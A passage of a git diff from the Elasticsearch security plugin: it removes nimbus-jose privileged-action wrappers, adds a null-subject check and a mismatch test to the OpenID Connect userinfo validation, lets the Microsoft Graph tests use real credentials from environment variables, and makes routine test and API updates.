org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getDouble(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static String getString(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<String>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getString(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static URI getURI(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<URI>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getURI(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static List<Object> getJSONArray(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<List<Object>>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getJSONArray(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static String[] getStringArray(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<String[]>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getStringArray(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static Map<String, Object>[] getJSONObjectArray(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Map<String, Object>[]>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils - .getJSONObjectArray(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static List<String> getStringList(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<List<String>>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getStringList(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static Map<String, Object> getJSONObject(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Map<String, Object>>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getJSONObject( - o, - key - ) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static Base64URL getBase64URL(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Base64URL>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getBase64URL(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static Date getEpochSecondAsDate(final Map<String, Object> o, final String key) throws ParseException { - try { - return AccessController.doPrivileged( - (PrivilegedExceptionAction<Date>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.getEpochSecondAsDate(o, key) - ); - } catch (PrivilegedActionException e) { - throw (ParseException) e.getException(); - } - } - - public static String toJSONString(final Map<String, ?> o) { - return AccessController.doPrivileged( - (PrivilegedAction<String>) () -> org.elasticsearch.nimbus.jose.util.JSONObjectUtils.toJSONString(o) - ); - } - - public static Map<String, Object> newJSONObject() { - return AccessController.doPrivileged( - (PrivilegedAction<Map<String, Object>>) org.elasticsearch.nimbus.jose.util.JSONObjectUtils::newJSONObject - ); - } - - private JSONObjectUtils() {} -} diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONStringUtils.java b/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONStringUtils.java deleted file mode 100644 index e9e34d21ce7d6..0000000000000 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/src/main/java/com/nimbusds/jose/util/JSONStringUtils.java +++ /dev/null @@ -1,26 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0. 
- */ - -package com.nimbusds.jose.util; - -import java.security.AccessController; -import java.security.PrivilegedAction; - -/** - * This class wraps {@link org.elasticsearch.nimbus.jose.util.JSONStringUtils}, which is copied directly from the source library, and delegates to - * that class as quickly as possible. This layer is only here to provide a point at which we can insert - * {@link java.security.AccessController#doPrivileged(PrivilegedAction)} calls as necessary. We don't do anything here - * other than ensure gson has the proper security manager permissions. - */ -public class JSONStringUtils { - - public static String toJSONString(final String string) { - return AccessController.doPrivileged((PrivilegedAction<String>) () -> org.elasticsearch.nimbus.jose.util.JSONStringUtils.toJSONString(string)); - } - - private JSONStringUtils() {} -} diff --git a/x-pack/plugin/security/qa/microsoft-graph-authz-tests/build.gradle b/x-pack/plugin/security/qa/microsoft-graph-authz-tests/build.gradle index f949902c68079..1fd93d730f54f 100644 --- a/x-pack/plugin/security/qa/microsoft-graph-authz-tests/build.gradle +++ b/x-pack/plugin/security/qa/microsoft-graph-authz-tests/build.gradle @@ -8,7 +8,34 @@ dependencies { clusterModules project(":modules:analysis-common") } +boolean useFixture = false +String msGraphTenantId = System.getenv("ms_graph_tenant_id") +String msGraphClientId = System.getenv("ms_graph_client_id") +String msGraphClientSecret = System.getenv("ms_graph_client_secret") +String msGraphUsername = System.getenv("ms_graph_username") +String msGraphGroupId = System.getenv("ms_graph_group_id") + +if (!msGraphTenantId || !msGraphClientId || !msGraphClientSecret || !msGraphUsername || !msGraphGroupId) { + msGraphTenantId = "tenant-id" + msGraphClientId = "client_id" + msGraphClientSecret = "client_secret" + msGraphUsername = "Thor" + msGraphGroupId = "test_group" + useFixture = true +} + tasks.named("javaRestTest").configure { + systemProperty "test.ms_graph.fixture", useFixture + systemProperty "test.ms_graph.tenant_id", msGraphTenantId + systemProperty "test.ms_graph.client_id", msGraphClientId + systemProperty "test.ms_graph.client_secret", msGraphClientSecret + systemProperty "test.ms_graph.username", msGraphUsername + systemProperty "test.ms_graph.group_id", msGraphGroupId + // disable tests in FIPS mode as we need to use a custom truststore containing the certs used in MicrosoftGraphHttpFixture buildParams.withFipsEnabledOnly(it) } + +tasks.register("msGraphThirdPartyTest") { + dependsOn "javaRestTest" } diff --git a/x-pack/plugin/security/qa/microsoft-graph-authz-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/authz/microsoft/MicrosoftGraphAuthzPluginIT.java b/x-pack/plugin/security/qa/microsoft-graph-authz-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/authz/microsoft/MicrosoftGraphAuthzPluginIT.java index d003e9dec9c4a..fad71a4348aa5 100644 --- a/x-pack/plugin/security/qa/microsoft-graph-authz-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/authz/microsoft/MicrosoftGraphAuthzPluginIT.java +++ b/x-pack/plugin/security/qa/microsoft-graph-authz-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/authz/microsoft/MicrosoftGraphAuthzPluginIT.java @@ -17,6 +17,7 @@ import org.elasticsearch.common.settings.SecureString; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.util.concurrent.ThreadContext; +import org.elasticsearch.core.Booleans; import org.elasticsearch.core.PathUtils; import org.elasticsearch.test.TestTrustStore; import org.elasticsearch.test.XContentTestUtils; @@ -51,11 
+52,12 @@ public class MicrosoftGraphAuthzPluginIT extends ESRestTestCase { - private static final String TENANT_ID = "tenant-id"; - private static final String CLIENT_ID = "client_id"; - private static final String CLIENT_SECRET = "client_secret"; - private static final String USERNAME = "Thor"; - private static final String EXPECTED_GROUP = "test_group"; + private static final String TENANT_ID = System.getProperty("test.ms_graph.tenant_id"); + private static final String CLIENT_ID = System.getProperty("test.ms_graph.client_id"); + private static final String CLIENT_SECRET = System.getProperty("test.ms_graph.client_secret"); + private static final String USERNAME = System.getProperty("test.ms_graph.username"); + private static final String EXPECTED_GROUP = System.getProperty("test.ms_graph.group_id"); + private static final Boolean USE_FIXTURE = Booleans.parseBoolean(System.getProperty("test.ms_graph.fixture")); private static final List TEST_USERS = List.of( new MicrosoftGraphHttpFixture.TestUser( @@ -90,12 +92,14 @@ public class MicrosoftGraphAuthzPluginIT extends ESRestTestCase { ); @ClassRule - public static TestRule ruleChain = RuleChain.outerRule(graphFixture).around(trustStore).around(cluster); + public static TestRule ruleChain = USE_FIXTURE + ? RuleChain.outerRule(graphFixture).around(trustStore).around(cluster) + : RuleChain.outerRule(cluster); private static final String IDP_ENTITY_ID = "http://idp.example.org/"; private static ElasticsearchCluster initTestCluster() { - return ElasticsearchCluster.local() + final var clusterBuilder = ElasticsearchCluster.local() .module("analysis-common") .setting("xpack.security.enabled", "true") .setting("xpack.license.self_generated.type", "trial") @@ -118,15 +122,22 @@ private static ElasticsearchCluster initTestCluster() { .setting("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.client_id", CLIENT_ID) .keystore("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.client_secret", CLIENT_SECRET) .setting("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.tenant_id", TENANT_ID) - .setting("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.graph_host", () -> graphFixture.getBaseUrl() + "/v1.0") - .setting("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.access_token_host", graphFixture::getBaseUrl) .setting("logger.org.elasticsearch.xpack.security.authz.microsoft", "TRACE") .setting("logger.com.microsoft", "TRACE") - .setting("logger.com.azure", "TRACE") - .systemProperty("javax.net.ssl.trustStore", () -> trustStore.getTrustStorePath().toString()) - .systemProperty("javax.net.ssl.trustStoreType", "jks") - .systemProperty("tests.azure.credentials.disable_instance_discovery", "true") - .build(); + .setting("logger.com.azure", "TRACE"); + + if (USE_FIXTURE) { + clusterBuilder.setting( + "xpack.security.authc.realms.microsoft_graph.microsoft_graph1.graph_host", + () -> graphFixture.getBaseUrl() + "/v1.0" + ) + .setting("xpack.security.authc.realms.microsoft_graph.microsoft_graph1.access_token_host", graphFixture::getBaseUrl) + .systemProperty("javax.net.ssl.trustStore", () -> trustStore.getTrustStorePath().toString()) + .systemProperty("javax.net.ssl.trustStoreType", "jks") + .systemProperty("tests.azure.credentials.disable_instance_discovery", "true"); + } + + return clusterBuilder.build(); } private static String getIDPMetadata() { @@ -210,6 +221,7 @@ public void testAuthenticationSuccessful() throws Exception { } public void testConcurrentAuthentication() throws Exception { + 
assumeTrue("This needs the test server as the real account only has one user configured", USE_FIXTURE); final var concurrentLogins = 3; final var resultsListener = new PlainActionFuture>>(); diff --git a/x-pack/plugin/security/qa/multi-cluster/src/javaRestTest/java/org/elasticsearch/xpack/remotecluster/RemoteClusterSecurityEsqlIT.java b/x-pack/plugin/security/qa/multi-cluster/src/javaRestTest/java/org/elasticsearch/xpack/remotecluster/RemoteClusterSecurityEsqlIT.java index 226dc14d37158..2c545b54b37ef 100644 --- a/x-pack/plugin/security/qa/multi-cluster/src/javaRestTest/java/org/elasticsearch/xpack/remotecluster/RemoteClusterSecurityEsqlIT.java +++ b/x-pack/plugin/security/qa/multi-cluster/src/javaRestTest/java/org/elasticsearch/xpack/remotecluster/RemoteClusterSecurityEsqlIT.java @@ -848,18 +848,18 @@ public void testCrossClusterEnrichWithOnlyRemotePrivs() throws Exception { | ENRICH countries | STATS size=count(*) by country | SORT size DESC - | LIMIT 2""")); + | LIMIT 3""")); assertOK(response); Map responseAsMap = entityAsMap(response); List columns = (List) responseAsMap.get("columns"); List values = (List) responseAsMap.get("values"); assertEquals(2, columns.size()); - assertEquals(2, values.size()); + assertEquals(3, values.size()); List flatList = values.stream() .flatMap(innerList -> innerList instanceof List ? ((List) innerList).stream() : Stream.empty()) .collect(Collectors.toList()); - assertThat(flatList, containsInAnyOrder(1, 3, "usa", "germany")); + assertThat(flatList, containsInAnyOrder(1, 1, 3, "usa", "germany", "japan")); } private void createAliases() throws Exception { diff --git a/x-pack/plugin/security/qa/operator-privileges-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/operator/Constants.java b/x-pack/plugin/security/qa/operator-privileges-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/operator/Constants.java index 881ab821e62f6..fd576bff413a0 100644 --- a/x-pack/plugin/security/qa/operator-privileges-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/operator/Constants.java +++ b/x-pack/plugin/security/qa/operator-privileges-tests/src/javaRestTest/java/org/elasticsearch/xpack/security/operator/Constants.java @@ -73,7 +73,6 @@ public class Constants { "cluster:admin/scripts/painless/context", "cluster:admin/scripts/painless/execute", "cluster:admin/streams/logs/toggle", - "cluster:admin/streams/status", "cluster:admin/synonyms/delete", "cluster:admin/synonyms/get", "cluster:admin/synonyms/put", @@ -373,6 +372,7 @@ public class Constants { "cluster:monitor/settings", "cluster:monitor/state", "cluster:monitor/stats", + "cluster:monitor/streams/status", "cluster:monitor/task", "cluster:monitor/task/get", "cluster:monitor/tasks/lists", diff --git a/x-pack/plugin/security/src/internalClusterTest/java/org/elasticsearch/test/SecuritySingleNodeTestCase.java b/x-pack/plugin/security/src/internalClusterTest/java/org/elasticsearch/test/SecuritySingleNodeTestCase.java index 3d640cd962c19..5de501e42d1f2 100644 --- a/x-pack/plugin/security/src/internalClusterTest/java/org/elasticsearch/test/SecuritySingleNodeTestCase.java +++ b/x-pack/plugin/security/src/internalClusterTest/java/org/elasticsearch/test/SecuritySingleNodeTestCase.java @@ -69,6 +69,7 @@ * {@link SecurityIntegTestCase} due to simplicity and improved speed from not needing to start * multiple nodes and wait for the cluster to form. 
*/ +@ESTestCase.WithoutEntitlements // requires entitlement delegation ES-12382 public abstract class SecuritySingleNodeTestCase extends ESSingleNodeTestCase { private static SecuritySettingsSource SECURITY_DEFAULT_SETTINGS = null; diff --git a/x-pack/plugin/security/src/main/java/module-info.java b/x-pack/plugin/security/src/main/java/module-info.java index 80986de66d89a..88b421e1efe31 100644 --- a/x-pack/plugin/security/src/main/java/module-info.java +++ b/x-pack/plugin/security/src/main/java/module-info.java @@ -25,7 +25,6 @@ requires org.apache.httpcomponents.httpclient; requires org.apache.httpcomponents.httpasyncclient; requires org.apache.httpcomponents.httpcore.nio; - requires org.apache.log4j; requires org.apache.logging.log4j; requires org.apache.logging.log4j.core; requires org.apache.lucene.core; diff --git a/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/Security.java b/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/Security.java index 740c11ea97306..dad6fddef371d 100644 --- a/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/Security.java +++ b/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/Security.java @@ -956,7 +956,7 @@ Collection createComponents( components.add(privilegeStore); final ReservedRolesStore reservedRolesStore = new ReservedRolesStore(Set.copyOf(INCLUDED_RESERVED_ROLES_SETTING.get(settings))); - dlsBitsetCache.set(new DocumentSubsetBitsetCache(settings, threadPool)); + dlsBitsetCache.set(new DocumentSubsetBitsetCache(settings)); final FieldPermissionsCache fieldPermissionsCache = new FieldPermissionsCache(settings); RoleDescriptor.setFieldPermissionsCache(fieldPermissionsCache); diff --git a/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticator.java b/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticator.java index 8d02992c2ec3a..4bf93fc10e96c 100644 --- a/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticator.java +++ b/x-pack/plugin/security/src/main/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticator.java @@ -477,7 +477,20 @@ static void handleUserinfoResponse( if (httpResponse.getStatusLine().getStatusCode() == 200) { if (ContentType.parse(contentHeader.getValue()).getMimeType().equals("application/json")) { final JWTClaimsSet userInfoClaims = JWTClaimsSet.parse(contentAsString); - validateUserInfoResponse(userInfoClaims, verifiedIdTokenClaims.getSubject(), claimsListener); + String expectedSub = verifiedIdTokenClaims.getSubject(); + if (userInfoClaims.getSubject() == null || userInfoClaims.getSubject().isEmpty()) { + claimsListener.onFailure(new ElasticsearchSecurityException("Userinfo Response did not contain a sub Claim")); + return; + } else if (userInfoClaims.getSubject().equals(expectedSub) == false) { + claimsListener.onFailure( + new ElasticsearchSecurityException( + "Userinfo Response is not valid as it is for " + "subject [{}] while the ID Token was for subject [{}]", + userInfoClaims.getSubject(), + expectedSub + ) + ); + return; + } if (LOGGER.isTraceEnabled()) { LOGGER.trace("Successfully retrieved user information: [{}]", userInfoClaims); } @@ -527,27 +540,6 @@ static void handleUserinfoResponse( } } - /** - * Validates that the userinfo response contains a sub Claim and that this claim value is the same as the one returned in the ID Token - */ - private static void 
validateUserInfoResponse( - JWTClaimsSet userInfoClaims, - String expectedSub, - ActionListener<JWTClaimsSet> claimsListener - ) { - if (userInfoClaims.getSubject().isEmpty()) { - claimsListener.onFailure(new ElasticsearchSecurityException("Userinfo Response did not contain a sub Claim")); - } else if (userInfoClaims.getSubject().equals(expectedSub) == false) { - claimsListener.onFailure( - new ElasticsearchSecurityException( - "Userinfo Response is not valid as it is for " + "subject [{}] while the ID Token was for subject [{}]", - userInfoClaims.getSubject(), - expectedSub - ) - ); - } - } - - /** * Attempts to make a request to the Token Endpoint of the OpenID Connect provider in order to exchange an * authorization code for an Id Token (and potentially an Access Token) diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/test/SecurityIntegTestCase.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/test/SecurityIntegTestCase.java index d59dc56d15686..24b0caab73186 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/test/SecurityIntegTestCase.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/test/SecurityIntegTestCase.java @@ -60,6 +60,7 @@ * * @see SecuritySettingsSource */ +@ESTestCase.WithoutEntitlements // requires entitlement delegation ES-12382 public abstract class SecurityIntegTestCase extends ESIntegTestCase { private static SecuritySettingsSource SECURITY_DEFAULT_SETTINGS; diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/AuthenticationServiceTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/AuthenticationServiceTests.java index d0a9ee9d78a43..581da4e4dd016 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/AuthenticationServiceTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/AuthenticationServiceTests.java @@ -1980,6 +1980,11 @@ public void testInvalidToken() throws Exception { when(projectIndex.getUnavailableReason(any())).thenReturn(new ElasticsearchException(getTestName())); } else { when(projectIndex.isAvailable(any())).thenReturn(true); + doAnswer(invocationOnMock -> { + Runnable runnable = (Runnable) invocationOnMock.getArguments()[1]; + runnable.run(); + return null; + }).when(projectIndex).checkIndexVersionThenExecute(anyConsumer(), any(Runnable.class)); doAnswer(inv -> { final GetRequest request = inv.getArgument(0); final ActionListener<GetResponse> listener = inv.getArgument(1); diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/ActiveDirectoryRealmTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/ActiveDirectoryRealmTests.java index 1ff7ef10d348d..f6c98a467205e 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/ActiveDirectoryRealmTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/ActiveDirectoryRealmTests.java @@ -33,6 +33,7 @@ import org.elasticsearch.script.ScriptService; import org.elasticsearch.script.mustache.MustacheScriptEngine; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.EntitledTestPackages; import org.elasticsearch.threadpool.TestThreadPool; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.watcher.ResourceWatcherService; @@ -106,6 +107,7 @@ * The username used to authenticate then has to be in the form of CN=user. 
Finally the username needs to be added as an * additional bind DN with a password in the test setup since it really is not a DN in the ldif file */ +@EntitledTestPackages(value = { "com.unboundid.ldap.listener" }) // tests start LDAP server that listens for incoming connections public class ActiveDirectoryRealmTests extends ESTestCase { private static final String PASSWORD = "password"; diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/support/LdapTestCase.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/support/LdapTestCase.java index 769491742ad5d..18741b5a13a99 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/support/LdapTestCase.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/ldap/support/LdapTestCase.java @@ -29,6 +29,7 @@ import org.elasticsearch.core.TimeValue; import org.elasticsearch.env.TestEnvironment; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.EntitledTestPackages; import org.elasticsearch.watcher.ResourceWatcherService; import org.elasticsearch.xpack.core.XPackSettings; import org.elasticsearch.xpack.core.security.authc.RealmConfig; @@ -73,6 +74,7 @@ import static org.elasticsearch.xpack.core.security.authc.ldap.support.SessionFactorySettings.URLS_SETTING; import static org.hamcrest.Matchers.is; +@EntitledTestPackages(value = { "com.unboundid.ldap.listener" }) // tests start LDAP server that listens for incoming connections public abstract class LdapTestCase extends ESTestCase { protected static final RealmConfig.RealmIdentifier REALM_IDENTIFIER = new RealmConfig.RealmIdentifier("ldap", "ldap1"); diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticatorTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticatorTests.java index 76069ce500ad9..ebf98b035f7d6 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticatorTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authc/oidc/OpenIdConnectAuthenticatorTests.java @@ -108,6 +108,7 @@ import java.util.Map; import java.util.UUID; import java.util.concurrent.CountDownLatch; +import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicReference; import javax.crypto.SecretKey; @@ -968,6 +969,53 @@ public void testHandleUserinfoResponseFailure() throws Exception { ); } + public void testHandleUserinfoValidationFailsOnNotMatchingSubject() throws Exception { + final ProtocolVersion httpVersion = randomFrom(HttpVersion.HTTP_0_9, HttpVersion.HTTP_1_0, HttpVersion.HTTP_1_1); + final HttpResponse response = new BasicHttpResponse(new BasicStatusLine(httpVersion, RestStatus.OK.getStatus(), "OK")); + + final String sub = randomAlphaOfLengthBetween(4, 36); + final String inf = randomAlphaOfLength(12); + final JWTClaimsSet infoClaims = new JWTClaimsSet.Builder().subject("it-is-a-different-subject").claim("inf", inf).build(); + final StringEntity entity = new StringEntity(infoClaims.toString(), ContentType.APPLICATION_JSON); + if (randomBoolean()) { + entity.setContentEncoding( + randomFrom(StandardCharsets.UTF_8.name(), StandardCharsets.UTF_16.name(), StandardCharsets.US_ASCII.name()) + ); + } + response.setEntity(entity); + + final String idx = randomAlphaOfLength(8); + final JWTClaimsSet 
idClaims = new JWTClaimsSet.Builder().subject(sub).claim("idx", idx).build(); + final AtomicBoolean listenerCalled = new AtomicBoolean(false); + final PlainActionFuture<JWTClaimsSet> future = new PlainActionFuture<>() { + + @Override + public void onResponse(JWTClaimsSet result) { + assertTrue("listener called more than once", listenerCalled.compareAndSet(false, true)); + super.onResponse(result); + } + + @Override + public void onFailure(Exception e) { + assertTrue("listener called more than once", listenerCalled.compareAndSet(false, true)); + super.onFailure(e); + } + }; + + this.authenticator = buildAuthenticator(); + OpenIdConnectAuthenticator.handleUserinfoResponse(response, idClaims, future); + var e = expectThrows(ElasticsearchSecurityException.class, future::actionGet); + + assertThat( + e.getMessage(), + equalTo( + "Userinfo Response is not valid as it is for subject [it-is-a-different-subject] while the ID Token was for subject [" + + sub + + "]" + ) + ); + } + public void testHandleTokenResponseNullContentType() { final HttpResponse response = new BasicHttpResponse(HttpVersion.HTTP_1_1, RestStatus.OK.getStatus(), ""); final StringEntity entity = new StringEntity("", (ContentType) null); diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/IndicesAndAliasesResolverTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/IndicesAndAliasesResolverTests.java index cb6db57ee5558..54e10ddcf3139 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/IndicesAndAliasesResolverTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/IndicesAndAliasesResolverTests.java @@ -61,7 +61,6 @@ import org.elasticsearch.protocol.xpack.graph.GraphExploreRequest; import org.elasticsearch.search.internal.ShardSearchRequest; import org.elasticsearch.test.ESTestCase; -import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.transport.EmptyRequest; import org.elasticsearch.transport.NoSuchRemoteClusterException; import org.elasticsearch.transport.TransportRequest; @@ -255,7 +254,7 @@ public void setup() { mock(ApiKeyService.class), mock(ServiceAccountService.class), TestProjectResolvers.DEFAULT_PROJECT_ONLY, - new DocumentSubsetBitsetCache(Settings.EMPTY, mock(ThreadPool.class)), + new DocumentSubsetBitsetCache(Settings.EMPTY), RESTRICTED_INDICES, EsExecutors.DIRECT_EXECUTOR_SERVICE, rds -> {} diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/store/CompositeRolesStoreTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/store/CompositeRolesStoreTests.java index 5615c5dd8ddf0..3279988567ddf 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/store/CompositeRolesStoreTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/authz/store/CompositeRolesStoreTests.java @@ -3861,7 +3861,7 @@ private RoleProviders buildRolesProvider( } private DocumentSubsetBitsetCache buildBitsetCache() { - return new DocumentSubsetBitsetCache(Settings.EMPTY, mock(ThreadPool.class)); + return new DocumentSubsetBitsetCache(Settings.EMPTY); } private static class InMemoryRolesProvider implements BiConsumer<Set<String>, ActionListener<RoleRetrievalResult>> { diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SecurityNetty4HeaderSizeLimitTests.java
b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SecurityNetty4HeaderSizeLimitTests.java index eafd825376d66..45a4f4f0dcdca 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SecurityNetty4HeaderSizeLimitTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SecurityNetty4HeaderSizeLimitTests.java @@ -24,7 +24,6 @@ import org.elasticsearch.mocksocket.MockSocket; import org.elasticsearch.tasks.TaskManager; import org.elasticsearch.telemetry.metric.MeterRegistry; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.threadpool.DefaultBuiltInExecutorBuilders; import org.elasticsearch.threadpool.ThreadPool; @@ -111,8 +110,7 @@ public void onRequestReceived(long requestId, String action) { (request, channel, task) -> channel.sendResponse(ActionResponse.Empty.INSTANCE), EsExecutors.DIRECT_EXECUTOR_SERVICE, false, - true, - Tracer.NOOP + true ) ); securityNettyTransport.start(); diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SimpleSecurityNetty4ServerTransportTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SimpleSecurityNetty4ServerTransportTests.java index b984295155c1f..a27e9a1cbda8f 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SimpleSecurityNetty4ServerTransportTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/security/transport/netty4/SimpleSecurityNetty4ServerTransportTests.java @@ -14,7 +14,6 @@ import org.apache.lucene.util.Constants; import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.action.support.TestPlainActionFuture; @@ -1059,7 +1058,7 @@ public void executeHandshake( super.executeHandshake(node, channel, profile, listener); } else { assert version.equals(TransportVersion.current()); - listener.onResponse(TransportVersions.MINIMUM_COMPATIBLE); + listener.onResponse(TransportVersion.minimumCompatible()); } } diff --git a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/ssl/SSLErrorMessageFileTests.java b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/ssl/SSLErrorMessageFileTests.java index 4f64b780e1f97..2ac2d4ebf0c32 100644 --- a/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/ssl/SSLErrorMessageFileTests.java +++ b/x-pack/plugin/security/src/test/java/org/elasticsearch/xpack/ssl/SSLErrorMessageFileTests.java @@ -16,7 +16,6 @@ import org.elasticsearch.core.PathUtils; import org.elasticsearch.env.Environment; import org.elasticsearch.env.TestEnvironment; -import org.elasticsearch.jdk.RuntimeVersionFeature; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.xpack.core.ssl.SSLService; import org.junit.Before; @@ -363,11 +362,6 @@ private void checkBlockedResource( String configKey, BiConsumer<String, Settings.Builder> configure ) throws Exception { - assumeTrue( - "Requires Security Manager to block access, entitlements are not checked for unit tests", - RuntimeVersionFeature.isSecurityManagerAvailable() - ); - final String prefix = randomSslPrefix(); final Settings.Builder settings = Settings.builder(); configure.accept(prefix, settings); diff --git
